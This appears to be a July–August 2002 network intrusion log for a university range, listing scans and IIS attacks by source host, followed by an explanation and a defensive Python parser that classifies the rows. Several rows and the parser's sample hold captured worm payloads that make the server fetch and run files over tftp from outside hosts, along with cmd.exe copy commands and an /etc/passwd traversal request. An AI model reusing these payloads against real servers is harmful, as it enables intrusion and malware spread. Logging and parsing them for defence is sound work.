2002/07/23-23:10:53.96 80.139.231.84 (p508BE754.dip.t-dialin.net) scan net for port 21
2002/07/24-04:47:23.70 192.148.138.100 (Telstra,MELBOURNE,AU) scan net for ports 22,21,1433
2002/07/24-04:47:38.39 192.148.138.100 (Telstra,MELBOURNE,AU) scan net for port 21, 1433
2002/07/24-07:56:02.33 217.41.63.23 (host217-41-63-23.in-addr.btopenworld.com) scan net for ports 80,445,139,137
2002/07/24-10:42:59.51 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) probe port 445 select ips on net
2002/07/24-12:53:15.38 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) scan net for ports 23, 53, 113, 515
2002/07/24-13:56:38.57 65.223.127.153 (Rockliffe,CA,US) scan net for port 25
2002/07/24-21:34:05.82 131.103.121.94 (d1-0-0-3-3.a02.mlpsca01.us.ce.verio.net) 1. attack IIS server on 132.235.18.105 w/command
2002/07/24-21:34:05.82 131.103.121.94 (d1-0-0-3-3.a02.mlpsca01.us.ce.verio.net) 2. tftp.exe%20-i%20217.129.192.249%20get%20msn.exe%20
2002/07/24-22:48:20.07 138.238.16.72 (Howard University,Washington,DC) scan net for port 1433
2002/07/24-23:37:40.68 24.162.97.233 (cs2416297-233.hot.rr.com) scan net for ports 80, 445, 139
2002/07/25-01:03:10.19 62.194.76.62 (node-c-4c3e.a2000.nl) scan net for port 1433
2002/07/25-01:53:44.85 142.177.209.70 (nat209-80.mpoweredpc.net) scan net for port 22
2002/07/25-04:56:25.86 211.184.242.2 (korea crap) scan net for port 21
2002/07/25-04:56:39.55 211.184.242.2 (KYOUNGGU MIDDLE SCHOOL,KYONGBUK,KR) scan net for port 1433
2002/07/25-09:42:47.70 67.81.112.13 (ool-4351700d.dyn.optonline.net) scan net for port 139
2002/07/25-11:22:19.21 62.208.56.95:1998 (PlusServer GmbH,DE) telnet buffer overflow attack against 132.235.17.17
2002/07/25-12:05:03.18 63.147.83.244 (I Park,SanJose,CA,US) scan net for port 1433, SQL attack xp_cmdshell - program execution
2002/07/25-15:16:30.99 216.182.52.4 (Tellurian Networks,NJ,US) scan net for port 1433
2002/07/25-19:17:11.81 194.85.32.18 (ns.runnet.ru) scan select ips for port 1080
2002/07/25-19:17:11.81 195.175.238.161 (nwusr-40608.dial-in.ttnet.net.tr) slow scan of select ips for port 1080
2002/07/26-02:29:45.46 207.224.28.89 (mail.glickhead.com) scan net for port 3128
2002/07/26-02:56:01.25 209.246.72.191 (dialup-209.246.72.191.Dial1.NewYork1.Level3.net) 1. attack 132.235.18.105 via IIS, ftp servudaemon from 138.87.45.4 shit/shit
2002/07/26-02:56:01.25 209.246.72.191 (dialup-209.246.72.191.Dial1.NewYork1.Level3.net) 2. start servudaemon in \temp on port 5078 admin/!johndoe!
2002/07/26-09:23:29.55 218.7.43.254 (Harbin Engineering University 1,CN) IIS attack w/ tftp%20-i%20132.112.101.1%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/26-09:31:21.09 217.80.65.15 (pD950410F.dip.t-dialin.net) IIS probe port 80, servers answer on port 500
2002/07/26-09:41:28.54 217.80.65.15 (pD950410F.dip.t-dialin.net) IIS attack cmds = mkdir+c:\temp\temp\images\
2002/07/26-10:48:46.02 62.163.137.154 (a137154.upc-a.chello.nl) IIS attack 132.235.18.105 w/cmd tftp.exe+"-i"+62.163.137.154+get+WINMGNT.EXE
2002/07/26-11:11:37.06 211.52.53.251 (Korea crap) scan net for port 1433
2002/07/26-11:14:21.31 64.58.147.102 (COX COMUNICATIONS,CA,US) scan net for port 1433
2002/07/26-11:56:07.65 216.194.66.84 (devsik.com - CA) scan net for port 1080
2002/07/26-12:05:32.58 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) probe port 445 on microsoft machines
2002/07/26-13:07:24.16 63.127.111.50 (Contrado Inc.,TX,US) try to login to web server as root/Hindi_mp3z using telnet.
2002/07/26-13:16:16.53 216.104.118.248 (cable118-248.sudbury.cyberbeach.net) scan net for port 139
2002/07/26-15:34:17.38 203.129.254.22 (TP-Pune POP,IN) attack IIS on 132.235.18.105 w/ cmd tftp%20-i%20132.132.32.170%20GET%20cool.dll
2002/07/26-17:34:33.25 216.237.145.141 (Delta Internet Services,CA,US) scan net for port 1433
2002/07/26-17:42:31.09 217.5.114.148 (cw07.MD1.srv.t-online.de) attack IIS on 132.235.18.105 w/ cmd copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/26-18:30:47.50 24.102.152.215 (CPE0080c6f080e6.cpe.net.cable.rogers.com) IIS attack on 132.235.18.105
2002/07/26-20:31:17.08 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) scan net with ping, then for ports 1025, 6588
2002/07/26-20:32:49.66 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) ping scan of net
2002/07/26-20:44:18.95 203.151.79.202 (Dunkin Donuts,TH) scan net for port 1433
2002/07/26-20:50:33.17 203.151.79.150 (Dunkin Donuts,TH) scan net for port 1433
2002/07/27-02:09:55.15 209.101.135.199 (mdabord2.meridiandesign.com) scan net for port 25
2002/07/27-02:10:27.14 209.107.71.10 (Verio, Inc.) scan net for port 25
2002/07/27-02:11:01.33 200.11.69.170 (Entel S.A.,CL) scan net for port 25
2002/07/27-06:33:05.32 213.238.149.10 (Ihlas Net ISP,TR) scan net for port 1080
2002/07/27-11:02:18.69 194.85.32.18 (ns.runnet.ru) scan net for port 1080
2002/07/27-21:26:06.19 24.66.43.26 (h24-66-43-26.wp.shawcable.net) probe ports 445,139,137,80 on net, probe 445,139 hard on win machines
2002/07/27-22:54:18.20 68.58.22.17 (pcp01089863pcs.spedwy01.in.comcast.net) scan net for port 21
2002/07/27-23:15:39.59 61.34.16.130 (Yousung Hotel,KR) scan net for port 53
2002/07/28-06:03:38.34 63.143.182.149 (149.winstar.net) scan net for port 139
2002/07/28-09:00:36.58 68.58.22.17 (pcp01089863pcs.spedwy01.in.comcast.net) ping scan of net
2002/07/26-12:39:41.44 62.109.69.188 (b069188.adsl.hansenet.de) IIS attack - SAM attempt
2002/07/26-20:30:53.38 24.50.160.112 (pa-plum1a-112.pit.adelphia.net) scan net with ping
2002/07/28-08:51:14.62 68.58.22.17 (pcp01089863pcs.spedwy01.in.comcast.net) scan net for port 21, 80 5120
2002/07/28-11:35:06.44 172.184.254.254 (America Online, Inc.) scan net for port 21
2002/07/28-15:34:16.08 151.42.234.11 (IUnet,IT) scan net for port 139
2002/07/28-16:38:17.78 80.78.160.95 (admin4.telta.de) scan net for port 6112
2002/07/28-18:28:18.18 210.108.211.11 (ELECTRO LAND,SEOUL,KR) scan net for port 22
2002/07/29-03:30:13.44 209.220.92.162 (w162.z209220092.nyc-ny.dsl.cnc.net) scan net for port 1433
2002/07/29-05:12:30.18 209.220.92.162 (w162.z209220092.nyc-ny.dsl.cnc.net) attack MS-SQL w/user = sa
2002/07/29-07:22:46.14 218.113.216.100 (YahooBB218113216100.bbtec.net) TELNET solaris memory mismanagement exploit on multiple ips.
2002/07/29-11:16:59.80 80.71.96.16 (Keyworld,San Gwann, Malta) scan net for port 6112, buffer overflow attack - CDE
2002/07/29-13:29:18.72 210.126.108.197 (Nits,TAEJON,KR) scan net for port 21
2002/07/29-18:02:57.48 24.130.136.177 (-24-130-136-177.we.client2.attbi.com) scan net for port 445,80
2002/07/29-19:11:48.57 213.177.132.208 (adsl-132-208.wanadoo.be) scan net for port 21
2002/07/30-14:09:34.06 80.13.120.146 (ALille-208-1-2-146.abo.wanadoo.fr) scan net for port 1433
2002/07/30-18:00:04.55 210.243.153.200 (h200-210-243-153.seed.net.tw) scan net for port 1433
2002/07/30-19:37:44.81 209.115.212.185 (185.209-115-212-0.interbaun.com) scan net for port 139
2002/07/31-04:46:57.06 172.180.190.190 (ACB4BEBE.ipt.aol.com) scan net for port 21
2002/07/31-07:44:10.85 129.123.47.79 (erportal.hsg.usu.edu) scan net for port 1433
2002/07/31-13:21:44.77 211.44.112.179 (HANARO Telecom,KR) scan net for port 21
2002/07/31-19:21:53.39 24.192.39.25 (CPE0004230741c9-CM0010954a69d7.cpe.net.cable.rogers.com) scan net for port 80, 445
2002/07/31-21:27:34.62 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) bang on network printer port 631 to 2002/08/01-00:25:53.19
2002/08/08-05:46:26.11 218.2.166.23 (CHINANET jiangsu province network) scan net for ports 8080,8888,10088,81,3128,80,8000,8001,1080,1815,5262
2002/08/08-10:02:37.15 172.182.225.247 (ACB6E1F7.ipt.aol.com) scan net for port 21
2002/08/08-15:12:03.21 172.186.75.118 (ACBA4B76.ipt.aol.com) scan net for port 21
2002/08/08-21:03:45.07 213.98.20.99 (213-98-20-99.uc.nombres.ttd.es) use anon ftp to get dummy passwd file from ace
2002/08/09-01:54:30.25 217.1.77.163 (pD9014DA3.dip.t-dialin.net) scan net for port 21
2002/08/09-03:37:03.25 65.198.68.56 (netmapper.research.lumeta.com) probe 1 high num port on 132.235.1.3
2002/08/09-04:00:32.92 64.58.166.193 (64-58-166-193.cbi.cox-oc.net) scan net for port 6112
2002/08/09-05:17:40.65 80.35.246.93 (93.Red-80-35-246.pooles.rima-tde.net) use anon ftp to get dummy passwd file from ace
2002/08/09-05:20:53.53 172.173.162.178 (ACADA2B2.ipt.aol.com) scan net for port 512, probe ports 7,23,37
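The same few IIS payloads recur throughout the month: a cmd.exe reached through the web server is told to tftp a file down from some host (the tftp -i <host> GET cool.dll <drive>:\httpodbc.dll form is the propagation request of the Nimda.E worm; the WINMGNT.EXE, nc.exe and Serv-U ones are hand-driven), or cmd.exe is copied under a new name so later requests can call it directly. The following is an added example, not part of the original summary: a small Python parser that splits each row above into its four columns, URL-decodes the captured request fragment (both %20 and + appear as separators), pulls out the tftp server/file/destination and the cmd.exe copies, flags directory traversal, and tallies the ports the scans targeted. The sample rows are copied from the summary; the regexes, category names and the parse_row/classify/summarize functions are mine.

```python
"""Parse rows of the monthly attack summary and extract the IIS payloads and
scanned ports. Added example; the summary itself is the only input format."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample: rows copied from the July 2002 summary, one per line.
SAMPLE = r"""
2002/07/01-00:06:00.92 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20e:\httpodbc.dll
2002/07/01-09:05:19.24 213.224.83.118 (nchass03.telenet-ops.be) IIS attack 1. copy+\winnt\system32\cmd.exe+cmd1.exe
2002/07/01-13:12:32.90 129.237.97.94 (University of Kansas,KA,US) IIS attack cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\kill.exe
2002/07/01-15:14:20.63 213.51.120.15 (cc41746-a.sneek1.fr.nl.home.com) IIS attack tftp.exe+"-i"+213.51.120.15+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 2. GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
2002/07/07-14:24:46.62 12.26.124.10 (alice.sunlitsurf.com) IIS attack - tftp+-i+213.51.1.133+GET+nc.exe+c:\\inetpub\\scripts\\nc.exe
2002/07/05-19:46:47.14 61.177.254.209 () scan net for port 80
2002/07/06-09:38:36.57 212.195.19.1 () scan net for port 21 139 1433 80
2002/07/08-09:53:41.42 195.75.151.151:21 (Network of BCRS by IBM ITALIA,IT) scan net for port 21
2002/07/12-00:32:43.83 203.69.216.75 (East Jean Ltd.Taiwan Branch (Hong Kong),Taipei,TW) scan net for port 1433
2002/07/13-08:41:33.66 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) scan net for ports 21,23,80,445,139,137,180
"""

# "tftp[.exe] -i <server> GET <file> [<destination>]"; the -i may be quoted and
# tftp.exe may carry a stray "?" from the original request line.
TFTP_RE = re.compile(
    r'tftp(?:\.exe)?\??\s+"?-i"?\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)(?:\s+(\S+))?',
    re.IGNORECASE)
# "copy <something>.exe <new name>": cmd.exe (or ftp.exe) renamed for later use.
COPY_RE = re.compile(r"copy\s+(\S+\.exe)\s+(\S+)", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# "scan net for port 21 139" / "scan net for ports 21,23,80" / "portscan net on port 80"
PORTS_RE = re.compile(r"(?:scan ?net|portscan net)\s+(?:for|on)\s+ports?\s+([\d ,]+)",
                      re.IGNORECASE)


def parse_row(line):
    """Split one row into time, source ip[:port], dns name and notes. The dns
    column can itself contain parentheses, so it is matched by depth."""
    ts, src, rest = line.split(" ", 2)
    if not rest.startswith("("):
        raise ValueError(f"no dns column in row: {line!r}")
    depth, end = 0, 0
    for end, ch in enumerate(rest):
        depth += (ch == "(") - (ch == ")")
        if depth == 0:
            break
    ip, _, port = src.partition(":")
    return {"time": ts, "src_ip": ip, "src_port": int(port) if port else None,
            "dns": rest[1:end], "notes": rest[end + 1:].strip()}


def classify(row):
    """Return (category, details) for one row. Decode first: the captured IIS
    requests use %20 and + interchangeably as argument separators."""
    text = unquote_plus(row["notes"])
    m = TFTP_RE.search(text)
    if m:
        return "tftp_drop", {"tftp_server": m.group(1), "file": m.group(2), "dest": m.group(3)}
    m = COPY_RE.search(text)
    if m:
        return "shell_copy", {"src": m.group(1), "renamed_to": m.group(2)}
    if TRAVERSAL_RE.search(text):
        return "traversal", {}
    m = PORTS_RE.search(text)
    if m:
        ports = [int(p) for p in re.split(r"[ ,]+", m.group(1)) if p]
        return "portscan", {"ports": ports}
    return "other", {}


def summarize(text):
    """Count categories and scanned ports over all rows and keep the tftp
    droppers: (attacker, tftp server, file, destination) is what you block
    at the border and hunt for on the web servers."""
    categories, ports, drops = Counter(), Counter(), []
    for line in text.splitlines():
        if not line.strip():
            continue
        row = parse_row(line)
        cat, details = classify(row)
        categories[cat] += 1
        if cat == "portscan":
            ports.update(details["ports"])
        elif cat == "tftp_drop":
            drops.append((row["src_ip"], details["tftp_server"], details["file"], details["dest"]))
    return {"categories": categories, "scanned_ports": ports, "tftp_drops": drops}


if __name__ == "__main__":
    result = summarize(SAMPLE)
    for cat, n in result["categories"].most_common():
        print(f"{cat:12} {n}")
    print("most scanned ports:", result["scanned_ports"].most_common(5))
    for drop in result["tftp_drops"]:
        print("tftp drop: %s had the server pull %s from %s into %s" % drop)
```

Comparing the tftp server against the row's source address is worth doing on the full table: several rows above name a different host than the attacker, including addresses inside 132.235.0.0/16, which points at already-compromised machines being used to stage the file.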